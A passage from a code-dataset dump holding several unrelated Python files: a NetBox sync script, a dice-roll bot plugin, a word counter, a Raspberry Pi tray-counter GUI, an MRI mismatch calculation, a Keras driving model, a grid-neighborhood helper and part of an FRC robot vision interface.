childkey, childvalue in valuemapping[v][dictionarykey].items():\n                        #custom_fields, dnsservers\n                        if childkey not in updatedict:\n                            updatedict[childkey] = nbdict[childkey]\n                        nbvalue = nbdict[childkey][childvalue]\n\n                        logging.debug(f'ChildKey: {childkey} ChildValue: {childvalue} AnsibleValue: {child_values[dictionarykey]} NetboxValue: {nbvalue}')\n                        if nbvalue != child_values[dictionarykey]:\n                            updatedict[childkey].update({ childvalue : child_values[dictionarykey] })\n                continue\n            else:\n                nbvalue = nbdict[valuemapping[v]]\n\n\n            logging.debug(f'Found Value {v} mapping to {valuemapping[v]}\\nCurrent Netbox Value (to be overwritten): {nbvalue}')\n            if values[v] != nbvalue:\n                if type(valuemapping[v]) == dict:\n                    for key, value in valuemapping[v].items():\n                        if key in updatedict:\n                            updatedict[key].update({ value : values[v]})\n                        else:\n                            updatedict[key] = { value : values[v]}\n                else:\n                    updatedict[valuemapping[v]] = values[v]\n    logging.info(f'Updating {hostname}')\n    logging.debug(f'{updatedict}')\n    nbhost.update(updatedict)\n\ndef update_ip(hostname, values):\n    vm = False\n    if 'VMware' in values['ansible_product_name'] or 'Virtual' in values['ansible_product_name']:\n        nbhost = nb.virtualization.virtual_machines.get(name=hostname)\n        vm = True\n    else:\n        nbhost = nb.dcim.devices.get(name=hostname)\n\n\n    for interface in values['ansible_interfaces']:\n        if not re.match(regex_filter, interface):\n            logging.debug(f'Trying {interface}')\n            key = 'ansible_' + interface\n            if key in values:\n                logging.debug(f'Found ansible interface {key}')\n\n                if 'ipv4' not in values[key]:\n                    logging.debug(f\"{key} doesn't have an IP address. We don't care about it\")\n                    continue\n\n                ###################### INTERFACE CREATION / UPDATING\n                interfacedic = {\n                    'name': f'{interface}',\n                    'enabled': f'{values[key][\"active\"]}',\n                    'mtu': f'{values[key][\"mtu\"]}',\n                    'mac_address': f'{values[key][\"macaddress\"]}'\n                }\n                if vm:\n                    interfacedic['virtual_machine'] = { 'id' : nbhost.id }\n\n                    if not nb.virtualization.interfaces.get(virtual_machine_id=f'{nbhost.id}',name=f'{interface}'):\n                        logging.info(f'Creating a virtual interface with {interfacedic}')\n                        nb.virtualization.interfaces.create(interfacedic)\n                    nbiface = nb.virtualization.interfaces.get(virtual_machine_id=f'{nbhost.id}',name=f'{interface}')\n\n                else:\n                    interfacedic['device'] = { 'id' : nbhost.id }\n                    if not nb.dcim.interfaces.get(device_id=f'{nbhost.id}',name=f'{interface}'):\n                        logging.info(f'Creating a physical interface with {interfacedic}')\n                        nb.dcim.interfaces.create(interfacedic)\n                    nbiface = nb.dcim.interfaces.get(device_id=f'{nbhost.id}',name=f'{interface}')\n                logging.debug(f'Interface Info: {dict(nbiface)}')\n\n\n                ############# IP ADDRESS CREATION\n                networkinfo = {}\n                index = 0\n                networkinfo = { 'network100' : {'ip': values[key]['ipv4']['address'], 'mask' : convert_tocidr(values[key]['ipv4']['netmask'])} }\n\n                if 'ipv4_secondaries' in values[key]:\n                    logging.debug(f'{key} has multiple addresses assigned to it')\n                    for secondary in values[key]['ipv4_secondaries']:\n                        networkinfo[f'network{index}'] = { 'ip' : values[key]['ipv4_secondaries'][index]['address'], 'mask' : convert_tocidr(values[key]['ipv4_secondaries'][index]['netmask']) }\n                        index+=1\n\n                logging.debug(networkinfo)\n                for k, v in networkinfo.items():\n                    ipdic = {\n                        'address' : f'{networkinfo[k][\"ip\"]}/{networkinfo[k][\"mask\"]}',\n                        'interface' : { 'id' : nbiface.id }\n                    }\n                    try:\n                        nbip = nb.ipam.ip_addresses.get(address=networkinfo[k][\"ip\"])\n                    except ValueError:\n                        logging.critical(f'DUPLICATE IP DETECTED {networkinfo[k][\"ip\"]}')\n
                        continue\n\n                    if not nbip:\n                        logging.info(f'{hostname}: Adding {networkinfo[k][\"ip\"]}/{networkinfo[k][\"mask\"]} to netbox')\n                        nb.ipam.ip_addresses.create(ipdic)\n                    elif ('interface' in nbip) and (nbip.interface.id != nbiface.id):\n                        logging.warning(f'{hostname}: IP Detected, but interfaces differ. Found: {nbip.interface.id} Interface: {nbiface.id}')\n                        nbip.interface.id = nbiface.id\n                        nbip.save()\n                    else:\n                        nbip.save()\n\n\n\ndef convert_tocidr(mask):\n    return IPv4Network(f'0.0.0.0/{mask}').prefixlen\n\ndef work_onhost(hostname):\n    hostvalues = parse_json(hostname)\n    if 'ansible_facts' not in hostvalues:\n        logging.critical(f'{hostname} ANSIBLE dump is invalid')\n        badhosts.append(hostname)\n        return\n    #trim the dict down a little to make it easier to work with\n    hostvalues = hostvalues['ansible_facts']\n    update_host(hostname, hostvalues)\n    update_ip(hostname, hostvalues)\n\nbadhosts = []\ndef main():\n    if args.hostname:\n        work_onhost(args.hostname)\n    else:\n        files = os.listdir(args.factpath)\n        for f in files:\n            work_onhost(f)\n    if len(badhosts) > 0:\n        # one bad host per line (str.format has no sep= keyword)\n        logging.critical('HOSTS WITH PROBLEMS:\\n' + '\\n'.join(badhosts))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"sync_ansible_netbox.py","file_name":"sync_ansible_netbox.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
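The nested fact-to-field mappings above (plain strings versus single-entry {'custom_fields': ...} dicts) can be walked generically instead of branch-by-branch; a stand-alone sketch of that idea, with illustrative names that are not the script's API:

def apply_mapping(facts, mapping, nb_record):
    update = {}
    for fact, target in mapping.items():
        if fact not in facts:
            continue
        if isinstance(target, dict):          # e.g. {'custom_fields': 'kernel'}
            (outer, inner), = target.items()
            # copy the current server-side dict so manual entries survive
            bucket = update.setdefault(outer, dict(nb_record.get(outer) or {}))
            if bucket.get(inner) != facts[fact]:
                bucket[inner] = facts[fact]
        elif nb_record.get(target) != facts[fact]:
            update[target] = facts[fact]
    return update

print(apply_mapping({'ansible_kernel': '5.10'},
                    {'ansible_kernel': {'custom_fields': 'kernel'}},
                    {'custom_fields': {'kernel': '4.19'}}))
# -> {'custom_fields': {'kernel': '5.10'}}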
{"seq_id":"239574075","text":"##1dbdc6da34094db4e661ed43aac83d91\nimport traceback\nimport random\n\ndef diceroll(self):\n\ttry:\n\t\tsource = self.source.character\n\t\tb = self.args[0].lower().split(\"d\")\n\t\tc = b[1].split(\"+\")\n\t\tif self.params.lower().find(\"dc\")!=-1:\n\t\t\tdcmode = True\n\t\t\ttry:\n\t\t\t\tDC = int(self.args[2])\n\t\t\texcept:\n\t\t\t\t# echo the raw argument back (safely, in case it is missing)\n\t\t\t\tself.say(\"Cannot roll to DC '{}'. Syntax: '.d <>d<>+<> DC <>'\".format(self.args[2] if len(self.args) > 2 else ''), 0)\n\t\t\t\treturn\n\t\telse:\n\t\t\tdcmode = False\n\n\t\ttry:\n\t\t\tb[0] = int(b[0])\n\t\t\tc[0] = int(c[0])\n\t\t\tc[1] = int(c[1])\n\t\texcept IndexError:\n\t\t\tc=[c[0], 0]\n\t\texcept ValueError:\n\t\t\tself.say(\"Invalid input. (Not a number?)\", 0)\n\t\t\treturn\n\t\t# reject anything beyond 15d100+25\n\t\tif not (b[0] > 15 or c[0] > 100 or c[1] > 25):\n\t\t\tresults = []\n\t\t\tfor x in range(b[0]):\n\t\t\t\tresults.append(random.choice(range(1, c[0]+1))+c[1])\n\t\t\tif not dcmode:\n\t\t\t\tself.say(\"{} rolled {}d{}+{} => {}, total {}\".format(source, b[0], c[0], c[1], results, sum(results)), 2)\n\t\t\telse:\n\t\t\t\tdclist = []\n\t\t\t\tfor x in results:\n\t\t\t\t\tif x > DC:\n\t\t\t\t\t\tdclist.append(\"Success\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tdclist.append(\"Failure\")\n\t\t\t\tself.say(\"Rolling {}d{}+{}, DC {} => {!s}\".format(b[0], c[0], c[1], DC, dclist), 2)\n\t\telse:\n\t\t\tself.say(\"Out of range - only supports up to 15d100+25\", 0)\n\texcept Exception as error:\n\t\tself.writeLog(\"Error in module diceroll: {}\".format(error), 3)\n\t\tself.say(\"There has been an error during diceroll execution. We apologize.\", self.access_type)\n\t\ttraceback.print_exc()\n\ndef __init__(self):\n\ttry:\n\t\tself.functions['.d']=(\"diceroll\", 2, [0,1,2])\n\t\tself.helpDict[\".d\"]=\"Rolls a die. Usage .d <x>d<y>+<z> (DC <n>), e.g. .d 3d6+5 DC 4\"\n\texcept:\n\t\tself.writeLog(\"Error initializing plugin 'diceroll'\", 2)\n\t\tself.noteError()\n\t\ttraceback.print_exc()","sub_path":"plugins/diceroll.py","file_name":"diceroll.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"291192536","text":"import string\nimport pprint\n\nwith open(r\"D:\\hhgttg.txt\", \"r\") as f:\n    content = f.read().lower()\n\nwith open(r\"D:\\skip_words.txt\", \"r\") as f:\n    skip_words = f.read().lower().split()\n\nlist_word = content.split()\nprint(len(list_word))\nprint(len(skip_words))\n\n\nword_stats = {}\nfor word in list_word:\n    word = word.strip(string.punctuation)\n    if word not in skip_words:\n        if word in word_stats:\n            word_stats[word] += 1\n        else:\n            word_stats[word] = 1\n\n\n\n# pprint.pprint(word_stats)\nfor key in sorted(word_stats, key=word_stats.get, reverse=True):\n    print(\"%s:\\t%s\" % (key, word_stats[key]))","sub_path":"lesson_files.py","file_name":"lesson_files.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
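For reference, the same frequency count can be written with collections.Counter from the standard library; a self-contained sketch with inline sample text instead of the files above:

import string
from collections import Counter

text = "the quick brown fox jumps over the lazy dog the end"
skip_words = {"the", "over"}
counts = Counter(w.strip(string.punctuation) for w in text.lower().split()
                 if w.strip(string.punctuation) not in skip_words)
for word, n in counts.most_common():
    print("%s:\t%s" % (word, n))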
{"seq_id":"519034660","text":"import logging as log\nimport os\nimport webview\nimport requests  # needed by getWifiStatus\nfrom gpiozero import LineSensor\n\n# file paths\nLOG_FILE_PATH = \"debug.log\"\nHTML_FILES = \"assets/index.html\"\nWINDOW_WIDTH = 1400\nWINDOW_HEIGHT = 700\nGPIO_PIN = 17\n\n# class to interact with js in web page\nclass Api:\n    def __init__(self):\n        self._count = 0\n        self._foundTray = False\n        self._sensor = None\n        self._window = None\n\n    def setupSensor(self):\n        self._sensor = LineSensor(GPIO_PIN)\n        self._sensor.when_activated = self.beginTray\n        self._sensor.when_deactivated = self.endTray\n\n    def setupWindow(self):\n        self._window = webview.create_window(\"\", HTML_FILES, js_api=api, width=WINDOW_WIDTH, height=WINDOW_HEIGHT, fullscreen=True)\n\n    def setCount(self, count):\n        prev_count = self._count\n        if count>=0 and count<999:\n            self._count = count\n        log.info(\"Count has changed from %i to %i\", prev_count, self._count)\n\n    def beginTray(self):\n        self._foundTray = True\n        log.debug(\"Starting tray at %i trays left\", self._count)\n\n    def endTray(self):\n        if self._foundTray:\n            log.debug(\"Ending tray at %i trays left\", self._count)\n            self.updateCount()\n            self._foundTray = False\n        else:\n            log.debug(\"Weird tray detection at the beginning but not at the end\")\n\n    def updateCount(self):\n        prev_count = self._count\n        self._count -= 1\n\n        js_code = r\"\"\"\n        var calcText = document.getElementById('calc-textbox');\n        calcText.value = '{}';\n        \"\"\".format(self._count)\n        self._window.evaluate_js(js_code)\n\n        log.debug(\"Count has decreased from %i to %i\", prev_count, self._count)\n\n    def getWifiStatus(self):\n        try:\n            url = \"https://www.google.com\"\n            requests.get(url)\n            return {'status': True}\n        except:\n            return {'status': False}  # same key as the success branch\n\n    def turnOff(self):\n        print(\"Starting shut down on current device\")\n\n    def stopAPI(self):\n        pass\n\n# initialize class\napi = Api()\n\ndef configure_logging(logfile):\n    log.basicConfig(filename=logfile,\n                    level=log.DEBUG,\n                    format='%(asctime)s %(message)s',\n                    datefmt='%m/%d %I:%M:%S')\n\ndef start_hardware():\n    log.debug(\"Starting Hardware\")\n    api.setupSensor()\n\ndef start_webpage():\n    log.debug(\"Starting Webpage\")\n    api.setupWindow()\n    webview.start(gui='gtk')\n\ndef stop():\n    api.stopAPI()\n\nif __name__ == '__main__':\n    configure_logging(LOG_FILE_PATH)\n    start_hardware()\n    start_webpage()\n    stop()\n","sub_path":"GUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"287439301","text":"'''\n\nCalc mismatch\n2019-12-16\nby Yupei\n\n'''\nimport SimpleITK as sitk\nimport numpy as np\nimport os \n\nthreshold = 6\nresults_path = './results'\n\nrbf_path = os.path.join(results_path,'maps/rbf_map.nii')\nttp_path = os.path.join(results_path,'maps/ttp_map.nii')\n\nimg_rbf = sitk.ReadImage(rbf_path)\narr_rbf = sitk.GetArrayFromImage(img_rbf)\nprint(arr_rbf.max(), arr_rbf.min())\n\nimg_ttp = sitk.ReadImage(ttp_path)\narr_ttp = sitk.GetArrayFromImage(img_ttp)\nprint(arr_ttp.max(), arr_ttp.min())\n\n(height, width, length) = arr_ttp.shape\n\n# mismap = np.zeros(arr_ttp.shape)\nmap1 = np.zeros(arr_rbf.shape)\nmap2 = np.zeros(arr_ttp.shape)\n\n\nthresh = arr_rbf.max()*0.3\n# print(thresh)\nflag_1 = arr_rbf < thresh  # below 30% of the RBF maximum\nmap1[flag_1] = 1\n\nflag1 = arr_rbf <= 1  # near-zero RBF (background)\nmap1[flag1] = 0       # mask those voxels back out of map1\n\nflag2 = arr_ttp > threshold  # TTP above the threshold\nmap2[flag2] = 1              # mark those voxels\n\n# vectorized voxel counts; same totals as the original z/x/y triple loop\nvol_rbf = int(np.count_nonzero(flag1))\nvol_tmax = int(np.count_nonzero(flag2))\nprint(vol_rbf)\nprint(vol_tmax)\n\n\n\ndiff = vol_rbf - vol_tmax\nratio = vol_rbf/vol_tmax\nprint('Diff: {}'.format(diff))\nprint('Ratio: {:.2f}'.format(ratio))\n\nmismap = map1-map2\nmismap = sitk.GetImageFromArray(mismap)\nmap1 = sitk.GetImageFromArray(map1)\nmap2 = sitk.GetImageFromArray(map2)\n\n\n# sitk.WriteImage(mismap, os.path.join(results_path,'mismatch/rbf_mismap.nii'))\nsitk.WriteImage(map1, os.path.join(results_path,'mismatch/map1.nii'))\nsitk.WriteImage(map2, os.path.join(results_path,'mismatch/map2.nii'))\nsitk.WriteImage(mismap, os.path.join(results_path,'mismatch/mismap.nii'))\n\n\n\n\n","sub_path":"mismatch.py","file_name":"mismatch.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
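The voxel totals in mismatch.py above are plain boolean reductions; a small self-contained check that np.count_nonzero matches the explicit triple loop, using a synthetic volume in place of the NIfTI maps:

import numpy as np

arr = np.random.rand(4, 8, 8) * 12   # synthetic "map" volume
mask_low = arr <= 1                  # background / near-zero voxels
mask_high = arr > 6                  # voxels above the threshold
# count_nonzero over a boolean array equals the explicit z/x/y loop
assert int(np.count_nonzero(mask_high)) == sum(
    1 for z in range(arr.shape[0])
      for x in range(arr.shape[1])
      for y in range(arr.shape[2]) if mask_high[z, x, y])
print(np.count_nonzero(mask_low), np.count_nonzero(mask_high))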
{"seq_id":"12573278","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 23 13:38:19 2017\n\n@author: Yunshi_Zhao\n\"\"\"\nimport csv\nimport cv2\nimport numpy as np\nimport random\nimport sklearn\nfrom sklearn.model_selection import train_test_split\n\n#load all log files\nlines = []\nfiles = ['../sim_data/driving_log.csv',\n         '../sim_data/driving_log_recovery.csv',\n         '../sim_data/driving_log_recovery2.csv',\n         '../sim_data/driving_log_sample.csv']\n\nfor file in files:\n    with open(file) as f:\n        reader = csv.reader(f)\n        for line in reader:\n            # drop ~95% of the near-zero-steering samples to balance the data\n            if (float(line[3]) < 0.1 and float(line[3]) > -0.1) and random.uniform(0,1) > 0.05:\n                continue\n            lines.append(line)\n\n# split data into training set and validation set\ntrain_samples, validation_samples = train_test_split(lines)\n\n# generator for calling data one each time during training/validation\ndef generator(samples, batch_size=32):\n    num_samples = len(samples)\n    while 1:\n        sklearn.utils.shuffle(samples)\n        for offset in range(0, num_samples, batch_size):\n            batch_sample = samples[offset:offset+batch_size]\n\n            images = []\n            measurements = []\n            for line in batch_sample:\n                measurement = float(line[3])\n                # correction factor for left and right images\n                correction = 0.2 + random.uniform(-0.05,0.05)\n\n                center = line[0].split(\"\\\\\")[-1]\n                left = line[1].split(\"\\\\\")[-1]\n                right = line[2].split(\"\\\\\")[-1]\n                img_center = cv2.imread('../sim_data/IMG/'+center)\n                img_left = cv2.imread('../sim_data/IMG/'+left)\n                img_right = cv2.imread('../sim_data/IMG/'+right)\n\n                # augment picture by flipping it\n                img_flip = np.fliplr(img_center)\n\n                images.append(img_center)\n                images.append(img_left)\n                images.append(img_right)\n                images.append(img_flip)\n\n                measurements.append(measurement)\n                measurements.append(measurement+correction)\n                measurements.append(measurement-correction)\n                measurements.append(-measurement)\n\n            X_train = np.array(images)\n            y_train = np.array(measurements)\n            yield sklearn.utils.shuffle(X_train, y_train)\n\n#generator for training/validation\ntrain_generator = generator(train_samples)\nvalidation_generator = generator(validation_samples)\n\n# model architecture\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout, Activation\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.regularizers import l2\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU, ELU\n\nmodel = Sequential()\n# each activation must be a fresh layer instance; adding one shared object\n# repeatedly makes Keras treat it as a single reused layer\n#def act(): return LeakyReLU(alpha=0.05)\n#def act(): return Activation('relu')\ndef act():\n    return ELU(alpha=0.05)\n# normalization\nmodel.add(Lambda(lambda x: x/255.0 - 0.5, input_shape=(160, 320, 3)))\n# cropping images\nmodel.add(Cropping2D(cropping=((70,25),(0,0))))\n# 5 CNN layers\n# first layer has L2 regularizer to prevent overfitting\nmodel.add(Convolution2D(24,5,5,subsample=(2,2),W_regularizer=l2(0.001)))\nmodel.add(act())\nmodel.add(Convolution2D(36,5,5,subsample=(2,2)))\nmodel.add(act())\nmodel.add(Convolution2D(48,5,5,subsample=(2,2)))\nmodel.add(act())\nmodel.add(Convolution2D(64,3,3))\nmodel.add(act())\nmodel.add(Convolution2D(64,3,3))\nmodel.add(act())\n# 4 FC layers with 50% dropout\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dropout(0.5))\nmodel.add(act())\nmodel.add(Dense(50))\nmodel.add(Dropout(0.5))\nmodel.add(act())\nmodel.add(Dense(10))\nmodel.add(Dropout(0.5))\nmodel.add(act())\nmodel.add(Dense(1))\n# Mean squared error for loss function, and adam optimizer\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit_generator(train_generator,\n                    samples_per_epoch=len(train_samples)*4,\n                    validation_data=validation_generator,\n                    nb_val_samples=len(validation_samples)*4,\n                    nb_epoch=5)\n# save model\nmodel.save('model.h5')\nexit()","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"75172921","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom typing import *\n\n\ndef von_neumann_neighborhood(\n    x: int,\n    y: int,\n    r: int,\n    exclude_start_point: bool = True\n) -> Set[Tuple[int, int]]:\n    \"\"\"http://mathworld.wolfram.com/vonNeumannNeighborhood.html\"\"\"\n    result = set()\n    f = result.update\n    for i, j in enumerate([1 + 2 * i for i in range(r, -1, -1)]):\n        f((+i + x, k + y) for k in range(-j // 2 + 1, j // 2 + 1))\n        f((-i + x, k + y) for k in range(-j // 2 + 1, j // 2 + 1))\n\n    if exclude_start_point:\n        result.remove((x, y))\n\n    return result\n","sub_path":"ludejo_py37/y2018/m10/d22/von_neumann_neighborhood.py","file_name":"von_neumann_neighborhood.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
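A quick property check for the function above: a radius-r von Neumann neighborhood holds 2r(r+1)+1 lattice points, so 2r(r+1) once the start point is excluded. This sketch assumes von_neumann_neighborhood from the module above is importable:

for r in range(1, 6):
    pts = von_neumann_neighborhood(0, 0, r)
    assert len(pts) == 2 * r * (r + 1)
    assert all(abs(x) + abs(y) <= r for (x, y) in pts)  # diamond shape
print("neighborhood sizes ok")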
{"seq_id":"287439301","text":"# region preamble (misc notes)\n#########################################################################################################\n###\n### WRITTEN BY:\n###\n### ColonelKai - Kayra Acar\n### TUNAPRO1234 - Tuna Gul\n### BLACKSHADOW - Siyabend Urun\n###\n### FRC 2020 - NightVision - Target Detection Algorithm\n###\n### NightFury#7839 (our name may still change; discussions are ongoing)\n###\n#########################################################################################################\n\n\n# -->> . <<-- DO NOT DELETE THE DOT, THE CODE BREAKS\n# /\\ EVERYONE BOW BEFORE LORD DOT\n# |  OUR GOD THE DOT\n# |\n# if you look to your above, you can see programmers going nuts\n\n\"\"\"#####################################################################################################################\"TODO\"\n\n    14/2  CONFIGURATION BY TEAM NUMBER (OK)\n    14/2  SET UP LED CONTROLLING SYSTEM (For Interface)\n    14/2  Fix the bug where robot settings get written into the led control file\n    14/2  Write FRC7839-NightVision in the top right or left corner (COLONELKAI)\n    14/2  WRITE CURRENT SETTINGS / RETURN TO MAIN MENU (COLONELKAI)\n    14/2  INFO menu (authors - date - team - etc.) (COLONELKAI)\n    14/2  Create check_arduino() and call it inside key get\n    16/2  Try re-attaching the Arduino while in panic mode\n    16/2  handle_error() for save and get_setting\n    16/2  handle_error should forward errors to the mm mode kernel panic (half done but it works)\n    17/2  ADD A TEAM NUMBER SETTING TO THE ARDUINO CONFIG (TUNAPRO1234 and COLONELKAI)\n          (every press of button0 moves to the next digit)\n    17/2  LIVE FILE REFRESH IN THE SETTINGS MENU\n    17/2  Add the team number to the settings file\n    17-18/2  THE TEAM NUMBER TEXT MUST ALSO LIGHT UP WHITE\n    17-18/2  Add an 'is mm started' flag to the led file (to tell the camera algorithm whether it should read)\n    17-18/2  INFO MENU DOES NOT WORK\n    (FALSE)  Settings write error (TUNAPRO1234)\n    1/3   HANDLE THE SSID MENU (KAYRA)\n    28/2  ADAPT CHECK PORTS FOR LINUX\n\n# DETECT VIA THREADING WHETHER THE ARDUINO IS ATTACHED (KAYRA)\n\n# While in match mode, if led_camera is asked to turn off, the green led could blink (KAYRA)\n\n# BLUETOOTH COM PORT ERROR - just turn bluetooth off, silly (future tuna)\n\n# THE BLUE LED KEEPS BLINKING EVEN THOUGH MATCH MODE CAN BE STARTED\n\n# Remove the Turkish characters from the strings (ç, ı, İ, ö, ş, ü, ğ)\n\"TODO\"########################################################################################################################\"\"\"\n\n###############################################################################################################################\n##\n##\n## If you have read the ReadMe.md at https://github.com/FRC7839/NightVision you probably do not\n## need to read this. Use the code however you like; just leaving our name off would honestly hurt.\n##\n##\n## What InputPlus.py is, what it does, and reasons to use it:\n##\n##\n## First of all, if you are thinking of taking this for FRC2020, I am really very sorry about the\n## delay. Over the break I waited a while for Siyabend to improve the algorithm, and since there\n## was no robot I had to design a different prototype with a servo, and so on.\n##\n##\n## Because InputPlus.py is only the interface, it is code you can reuse every season; refreshing\n## the algorithm will be enough. Skim the code a little and you will see we did everything we\n## could to keep it from raising errors. If you hit detection or read errors, InputPlus puts\n## itself into PANIC MODE, keeps the led from turning off, and tries to write the settings to\n## file. Since the algorithm and this code talk only through a JSON file, either one crashing\n## never takes down the other.\n##\n##\n## To drive the program you can use one Arduino wired as described on our github page, one\n## potentiometer, two regular push buttons, and female headers for the leds and the Arduino\n## input. You should also use a Raspberry Pi and a screen for it (I recommend a case).\n##\n##\n## I will try to make the github page public for everyone to edit after FRC 2020 Bosphorus Regional.\n##\n##\n#########################################################################################################\n##                                                                                                     ##\n##  --skip-camera-check  : skips the camera check (Windows has no camera check anyway)                 ##\n##  --skip-network-check : skips the IP address check (silences the NOT CONNECTED TO RADIO error)      ##\n##  --pc-mode            : skip-camera and skip-network combined                                       ##\n##  --test-mode          : raised errors stop the program (not recommended during FRC)                 ##\n##  --pc-test-mode       : pc mode and test mode combined                                              ##\n##                                                                                                     ##\n#########################################################################################################\n\n\n###################### HOW THE CURSES LOOP WORKS ###############################################\n# First, the get-menu-values functions push every row that will be drawn into an array.        #\n# Each row is one element, and the get-menu-values functions keep reworking those elements     #\n# on every pass.                                                                               #\n# print_menu then takes them, computes their positions, and draws them on screen,              #\n# which lets us change the on-screen view live through get-menu-values.                        #\n#################################################################################################\n\n# using arduino_check_thread\n# note: wrap every read/write of its variables in try/except; it raises if the thread has not started\n# to start the thread: arduino_check_thread()\n# to stop the thread: arduino_check_thread.exitthread = True (wrap in try/except)\n# to read the result: example = check_arduino_thread_rv (the module-level flag the thread updates)\n\n#endregion\n\nfrom threading import Thread\nfrom frc_lib7839 import *\nimport threading\nimport pyfirmata\nimport curses\nimport json\nimport socket  # used by get_ip_menu_values (may also arrive via frc_lib7839's star import)\nimport timeit  # used in not_main to time the Arduino import\nimport time\nimport sys\nimport os\n\n# region global\n\nglobal pc_test_mode\nglobal skip_cam_arg\nglobal skip_nt_arg\nglobal test_mode\nglobal pc_mode\n\n\npc_test_mode = InputPFunctions.find_arg(\"--pc-test-mode\", num=True)\ntest_mode = InputPFunctions.find_arg(\"--test-mode\", num=True)\npc_mode = InputPFunctions.find_arg(\"--pc-mode\", num=True)\nmatch_mode_can_be_started = False\ncheck_arduino_thread_rv = True\n\n\nif os.name == \"nt\":\n    from frc_lib7839 import *\n    pc_mode = 1\n\nif pc_mode is not None and os.name == \"posix\":\n    sys.path.insert(1, '/home/pi/NightVision')\n    from frc_lib7839 import *\n\n\nif pc_mode is not None:\n    skip_cam_arg = 1\n    skip_nt_arg = 1\n\nelif pc_test_mode is not None:\n    pc_mode = 1\n    skip_cam_arg = 1\n    skip_nt_arg = 1\n    test_mode = 1\n\nelse:\n    skip_cam_arg = InputPFunctions.find_arg(\"--skip-camera-check\", num=True)\n    skip_nt_arg = InputPFunctions.find_arg(\"--skip-network-check\", num=True)\n\n# endregion\n
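# --- illustrative sketch, not part of the original flow -----------------------
# The UI and the vision algorithm only talk through a JSON settings file
# (DbFunctions wraps the real I/O). A minimal stand-alone round-trip of that
# idea, with a placeholder path and keys:
def _settings_roundtrip_demo(path='/tmp/nv_settings_demo.json'):
    demo = {'Led Status': True, 'Team Number': '7839'}
    with open(path, 'w') as fh:
        json.dump(demo, fh)      # the UI side writes...
    with open(path) as fh:
        return json.load(fh)     # ...and the algorithm side reads
# -------------------------------------------------------------------------------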
# NOTE\n# Because of autonomous, match mode needs a print function and a get-menu-values\n# of its own, different from all the other menus.\n# get menu values function for match mode\n\n\ndef match_mode(\n    stdscr,\n    settings=None,\n    led_blue=None,\n    led_camera=None,\n    led_red=None,\n    led_green=None,\n    swt1=None,\n    pot1=None,\n    PanicMenu=False,\n    errmsg=None,\n    err_type=None,\n    isReadError=False\n):\n    # match mode: a menu that only reports status\n    if not PanicMenu:  # started without an error\n        try:  # stop any leds that are still blinking\n            if flash_led.flashthreadopen:\n                flash_led.exitthread = True\n        except:\n            pass\n\n        led_blue.write(0)   # blue led off\n        led_green.write(1)  # green led on\n        # main loop\n        while True:\n            # try reading from the file\n            #settings = DbFunctions.get_setting(file_s)  # pulls the setting from the led control file\n            #handle_error(led_control, stdscr, PanicMenu=True)\n\n            settings[\"Match Mode Status\"] = True\n            # save the settings (also marks match mode as running)\n            rv3 = DbFunctions.save_settings(file_s, settings)\n            handle_error(rv3, stdscr, PanicMenu=True)\n\n            handle_error(settings, stdscr, PanicMenu=True)\n\n            m_menu_elements = []  # array of menu elements\n            m_menu_elements.append(\" ## MATCH MODE STARTED ## \")  # Title\n\n            # the LED is controlled by the computer; the menu just shows it\n            if settings[\"Led Status\"] is not None and settings[\"Led Status\"] in [\n                True,\n                False,\n                \"True\",\n                \"False\",\n            ]:\n                m_menu_elements.append(\n                    \" ## LED CONTROL : \" + str(settings[\"Led Status\"]) + \" ## \"\n                )\n\n            # if it cannot read on or off, report an error\n            else:\n                m_menu_elements.append(\" ## LED CONTROL FAILED ## \")\n                settings[\"Led Status\"] = True\n\n            try:\n                # the rest of the menu: a status report\n                m_menu_elements.append(\n                    \" ## TEAM_NUMBER : \" + str(settings[\"Team Number\"]) + \" ## \"\n                )\n                m_menu_elements.append(\n                    \" ## CAMERA_TOLERANCE : \"\n                    + str(settings[\"Camera Tolerance\"])\n                    + \" ## \"\n                )\n                m_menu_elements.append(\n                    \" ## ROBOT_LOCATION : \" + str(settings[\"Robot Location\"]) + \" ## \"\n                )\n                m_menu_elements.append(\n                    \" ## WAITING_PERIOD : \" + str(settings[\"Waiting Period\"]) + \" ## \"\n                )\n                m_menu_elements.append(\n                    \" ## AUTONOMOUS_MODE : \" + str(settings[\"Autonomous Mode\"]) + \" ## \"\n                )\n\n            except:\n                handle_error(all_errors[READ_ERR], stdscr, PanicMenu=True)\n\n            try:\n                if flash_led.flashthreadopen:  # stop the blinking light if there is one\n                    flash_led.exitthread = True\n            except:\n                pass\n\n            # led handling\n            if settings[\"Led Status\"] in [\"True\", True]:\n                ArduinoFunctions.led_write(led_green, led_camera, 1)  # on\n\n\n            elif settings[\"Led Status\"] in [\"False\", False]:\n                ArduinoFunctions.led_write(None, led_camera, 0)  # off\n                flash_led(led_green)\n\n            else:\n                ArduinoFunctions.led_write(led_green, led_camera, 1)  # on\n\n            # draw the screen\n            print_menu_for_match(stdscr, m_menu_elements)\n\n            time.sleep(3)\n            # exit condition\n            if (\n                ArduinoFunctions.map_x(pot1.read(), 0, 1, 0, max_v) == max_v\n                and 